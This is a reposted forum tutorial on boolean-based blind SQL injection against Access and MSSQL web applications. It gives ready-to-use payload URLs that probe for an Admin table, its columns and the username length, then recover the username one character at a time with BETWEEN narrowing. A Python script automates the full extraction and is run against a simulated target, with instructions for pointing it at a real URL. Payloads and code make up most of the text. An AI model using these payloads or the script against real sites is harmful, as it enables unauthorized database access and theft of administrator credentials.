Article Source: http://blog.powers.com.cn/forum_posts.asp?Tid=333&Pn=4
Author: YJD
□Detect whether injection is possible
================================================================================
http://URL/XX?id=1111 and 1=1   (normal page)
http://URL/XX?id=1111 and 1=2   (error page, or the page with the record missing)
If the two URLs render differently, the id value is being concatenated into the query unescaped, and every condition below can be answered the same way: normal page = true, error page = false.
================================================================================
□Detect the table
================================================================================
http://URL/XX?id=1111 and exists (select * from Admin)
A normal page means a table named Admin exists; an error page means it does not (or the database user cannot read it).
================================================================================
□Detect the column
================================================================================
http://URL/XX?id=1111 and exists (select username from Admin)
================================================================================
□Detect the row ID
================================================================================
http://URL/XX?id=1111 and exists (select ID from Admin where id=1)
================================================================================
□Detect the length
================================================================================
http://URL/XX?id=1111 and exists (select ID from Admin where Len(username)=5 and ID=1)
Try successive values (1, 2, 3, ...) until the normal page comes back; the value that works is the length of the username in row 1.
================================================================================
□Detect whether the database is MSSQL
================================================================================
http://URL/XX?id=1111 and exists (select * from sysobjects)
sysobjects is an MSSQL system table; Access has no such table, so this query returns the error page on an Access back end. The answer decides which function names to use in the steps below.
================================================================================
□Detect whether the character is English (single-byte)
================================================================================
The first Mid/Substring argument is the character position and the second is the length; the examples test character 1, so change the position to walk through the string.
(Access database)
http://URL/XX?id=1111 and exists (select ID from Admin where ASC(Mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL database)
http://URL/XX?id=1111 and exists (select ID from Admin where Unicode(Substring(username,1,1)) between 30 and 130 and ID=1)
A normal page means the character code lies in the ASCII range, i.e. it is a letter, digit or symbol rather than a double-byte (Chinese) character.
================================================================================
□Narrow the English range
================================================================================
(Access database)
http://URL/XX?id=1111 and exists (select ID from Admin where ASC(Mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL database)
http://URL/XX?id=1111 and exists (select ID from Admin where Unicode(Substring(username,1,1)) between 90 and 100 and ID=1)
Halve the interval on each request (keep the half that returns the normal page) until a single code is left; that takes about seven requests per character instead of up to 95 one-by-one guesses.
================================================================================
□Detect the character
================================================================================
(Access database)
http://URL/XX?id=1111 and exists (select ID from Admin where ASC(Mid(username,1,1))=97 and ID=1)
(MSSQL database)
http://URL/XX?id=1111 and exists (select ID from Admin where Unicode(Substring(username,1,1))=97 and ID=1)
A normal page confirms the character (97 is the code of "a"). Repeat the last three steps for positions 2, 3, ... up to the length found above.
================================================================================
Common functions
================================================================================
Access: ASC(character)          SQL Server: Unicode(character)
Purpose: return the character code (the ASCII code for a single-byte character; Unicode returns the Unicode code value of the first character, which agrees with ASC on the ASCII range).
Access: CHR(number)             SQL Server: nchar(number)
Purpose: the inverse of ASC/Unicode; return the character for a given code.
Access: Mid(string, n, l)       SQL Server: substring(string, n, l)
Purpose: return the substring of l characters starting at position n (positions are 1-based, so characters n through n+l-1).
Access: ABS(number)             SQL Server: ABS(number)
Purpose: return the absolute value of a number. Needed when guessing Chinese characters on Access, where ASC returns a negative value for a double-byte character, so the comparison is made on ABS(ASC(...)).
Access: A between B and C       SQL Server: A between B and C
Purpose: true when A lies between B and C (inclusive).
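The whole procedure above (injection check, length, BETWEEN narrowing, final '=' confirmation) automated in one script. This is an added example and not code from the original post; the target is a constructed in-memory stand-in (SimulatedTarget, with a made-up Admin row) that answers each payload the way the page answers 'and 1=1' versus 'and 1=2', so it runs offline and nothing is sent over the network. The payload builders produce exactly the Access (ASC/Mid) and MSSQL (Unicode/Substring) conditions shown in the sections above; the narrowing uses a binary search over the printable ASCII range, and a character outside that range (a Chinese character, for example) is reported as '?' because the final '=' check fails.

```python
import re

# Constructed sample row standing in for the real Admin table behind http://URL/XX.
FAKE_ADMIN_ROWS = {1: "admin"}

# Per-dialect "code of the character at position pos" (1-based), from the
# function table in the post: Access ASC/Mid, SQL Server Unicode/Substring.
CHAR_CODE = {
    "access": "ASC(Mid(username,{pos},1))",
    "mssql": "Unicode(Substring(username,{pos},1))",
}


def payload_truth(cond):
    """The 'and 1=1' / 'and 1=2' probe."""
    return f"and {cond}"


def payload_length(n, row_id=1):
    return f"and exists (select ID from Admin where Len(username)={n} and ID={row_id})"


def payload_between(dialect, pos, lo, hi, row_id=1):
    expr = CHAR_CODE[dialect].format(pos=pos)
    return f"and exists (select ID from Admin where {expr} between {lo} and {hi} and ID={row_id})"


def payload_equals(dialect, pos, code, row_id=1):
    expr = CHAR_CODE[dialect].format(pos=pos)
    return f"and exists (select ID from Admin where {expr}={code} and ID={row_id})"


class SimulatedTarget:
    """Hypothetical stand-in for the vulnerable page. ask() returns True for the
    'normal page' and False for the 'error page'. A payload it cannot parse is
    treated as a SQL error, i.e. False, which is what the real page would do."""
    _LEN = re.compile(r"Len\(username\)=(\d+) and ID=(\d+)")
    _BETWEEN = re.compile(r"\(username,(\d+),1\)\) between (\d+) and (\d+) and ID=(\d+)")
    _EQ = re.compile(r"\(username,(\d+),1\)\)=(\d+) and ID=(\d+)")

    def __init__(self, rows):
        self.rows = rows
        self.requests = 0  # one HTTP request per ask() on a real target

    def _code(self, row_id, pos):
        name = self.rows.get(row_id)
        if name is None or pos < 1 or pos > len(name):
            return None  # Mid/Substring past the end yields '' and the compare is false
        return ord(name[pos - 1])

    def ask(self, payload):
        self.requests += 1
        if payload == "and 1=1":
            return True
        if payload == "and 1=2":
            return False
        m = self._LEN.search(payload)
        if m:
            n, row_id = int(m.group(1)), int(m.group(2))
            return row_id in self.rows and len(self.rows[row_id]) == n
        m = self._BETWEEN.search(payload)
        if m:
            pos, lo, hi, row_id = (int(g) for g in m.groups())
            code = self._code(row_id, pos)
            return code is not None and lo <= code <= hi
        m = self._EQ.search(payload)
        if m:
            pos, code, row_id = (int(g) for g in m.groups())
            return self._code(row_id, pos) == code
        return False


def is_injectable(target):
    return target.ask(payload_truth("1=1")) and not target.ask(payload_truth("1=2"))


def find_length(target, max_len=32, row_id=1):
    # Linear scan, as the post does with Len(username)=5.
    for n in range(1, max_len + 1):
        if target.ask(payload_length(n, row_id)):
            return n
    return None


def find_char(target, dialect, pos, lo=32, hi=126, row_id=1):
    # Binary search with BETWEEN: keep the half that returns the normal page.
    while lo < hi:
        mid = (lo + hi) // 2
        if target.ask(payload_between(dialect, pos, lo, mid, row_id)):
            hi = mid
        else:
            lo = mid + 1
    # Final '=' check from the post; it fails if the real code was outside [lo, hi].
    return chr(lo) if target.ask(payload_equals(dialect, pos, lo, row_id)) else None


def extract_username(target, dialect, row_id=1):
    if not is_injectable(target):
        return None
    length = find_length(target, row_id=row_id)
    if length is None:
        return None
    chars = [find_char(target, dialect, pos, row_id=row_id) for pos in range(1, length + 1)]
    return "".join(c if c is not None else "?" for c in chars)


if __name__ == "__main__":
    t = SimulatedTarget(FAKE_ADMIN_ROWS)
    print(extract_username(t, "mssql"), "in", t.requests, "requests")
```

Against a real target, ask() would fetch http://URL/XX?id=1111 followed by the payload and compare the response with the known normal page; the rest of the script is unchanged. For Chinese characters on Access, wrap the ASC expression in ABS() and widen the search interval, as the function table notes.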